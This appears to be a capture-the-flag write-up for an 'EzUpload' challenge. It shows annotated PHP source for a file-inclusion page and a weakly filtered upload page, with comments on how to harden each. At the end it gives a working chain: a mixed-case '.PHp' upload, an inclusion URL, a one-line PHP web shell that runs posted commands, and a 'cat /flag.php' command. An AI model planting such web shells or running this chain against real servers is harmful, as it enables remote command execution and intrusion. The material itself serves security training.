EzUpload

文件上传加文件包含（本地文件包含，LFI）！！

User-agent:*
Disallow:/file_up1oad.php

<?php
/*
 * Challenge entry page: prints its own source, then includes whatever path
 * arrives in the `file` query parameter.
 *
 * Defect class: local file inclusion. The only guard is a blocklist on the
 * substring "flag" in the requested path. Nothing restricts the path to a
 * known set of files, so any file the PHP process can read may be included.
 */
// All error reporting is switched off, so a missing parameter or a failed
// include produces no diagnostic output.
error_reporting(0);
// Shows this file's source to every visitor.
highlight_file(__FILE__);
// Taken straight from the query string: no isset() check, no normalisation,
// no allowlist.
$file = $_GET['file'];
// Case-sensitive substring test on the path only; the content of the file
// that gets included is never inspected.
if (preg_match("/flag/", $file)){
die('Oh no!');
}
// include executes any PHP code found in the target regardless of its file
// extension, which is why a file stored by the upload page matters here.
// Hardening: resolve the parameter through a fixed allowlist of server-side
// paths instead of passing request data to include.
include $file;
?>
<?php
/*
 * Upload page: accepts one multipart field named `file`, runs three checks
 * (extension blocklist, MIME allowlist, content blocklist) and moves the file
 * into ./uploads/ under a generated name, then prints the resulting path.
 *
 * Each check below is weaker than it looks; the notes on the individual lines
 * say why and what a robust version would do instead.
 */
error_reporting(0);
// Sets the default timezone to 'PRC'.
date_default_timezone_set('PRC');
if(isset($_FILES['file'])) {
// basename() strips directory components from the client-supplied name.
$file_name = basename($_FILES["file"]["name"]);
// Extension is taken from the client-supplied name, case preserved.
$file_ext = pathinfo($file_name,PATHINFO_EXTENSION);
// The 'type' entry is the MIME type sent by the client; PHP does not verify it.
$file_type = $_FILES['file']['type'];
// Despite the variable name, this is the temporary file's path, not its content.
$file_content = $_FILES['file']['tmp_name'];
// Blocklist with a case-sensitive comparison: only the exact lowercase
// spellings are rejected, so a mixed-case variant (the uploaded name shown
// further down the page ends in ".PHp") and any unlisted extension pass.
// Hardening: lowercase the extension and compare against an allowlist, or
// assign the stored extension server-side from the detected file type.
if(in_array($file_ext, ['php', 'php3', 'php4', 'php5', 'phtml', 'pht'])) {
die('Php file ?');
}
// Allowlist, but applied to the client-declared MIME type rather than to the
// file content. Hardening: derive the type from the bytes (finfo / getimagesize).
if (!in_array($file_type, ['image/jpeg', 'image/gif', 'image/png'])){
die('Bad file');
}
// Keyword blocklist over the raw content (case-insensitive). It lists one
// opening tag and two function names; PHP code that uses none of the listed
// tokens is not detected, as the payload further down the page shows.
// Content filtering is not a substitute for storing uploads where they can
// neither be executed nor included.
if (preg_match("/<\?php|eval|assert|@/i", file_get_contents($file_content))){
die('Bad file of content !');
}
// Relative path: the directory is created next to this script.
// NOTE(review): the '/uploads/' URL echoed below and the /var/www/html/uploads
// path used later on the page suggest it sits inside the document root.
if (!file_exists('uploads')){
mkdir('uploads');
}
// The name is the MD5 of the current Unix timestamp (one-second resolution),
// so it is derivable from the upload time, and two uploads in the same second
// with the same extension map to the same name. The client-controlled
// extension is appended unchanged. Hardening: random_bytes()-based name plus
// a fixed, server-chosen extension.
$new_filename = md5(time()).'.'.$file_ext;
$u = move_uploaded_file($_FILES['file']['tmp_name'], './uploads/' . $new_filename);
if ($u){
echo 'Successful'."\n";
// The stored path is returned to the uploader.
echo '/uploads/'.$new_filename;
}
}
?>
<html>
<body>
<meta charset="UTF-8">
<h2>File upload</h2>
<form action="" method="post" enctype="multipart/form-data">
<label for="file">Filename:</label>
<input type="file" name="file" id="file"/><br />
<input type="submit" name="submit" value="submit" />
</form>
</body>
</html>

http://183.129.189.60:10000/?file=/var/www/html/uploads/feb9d6ed9eecff131277446b72c506d8.PHp


<script language="php">system($_POST[a]);echo 11111;</script>

cat /flag.php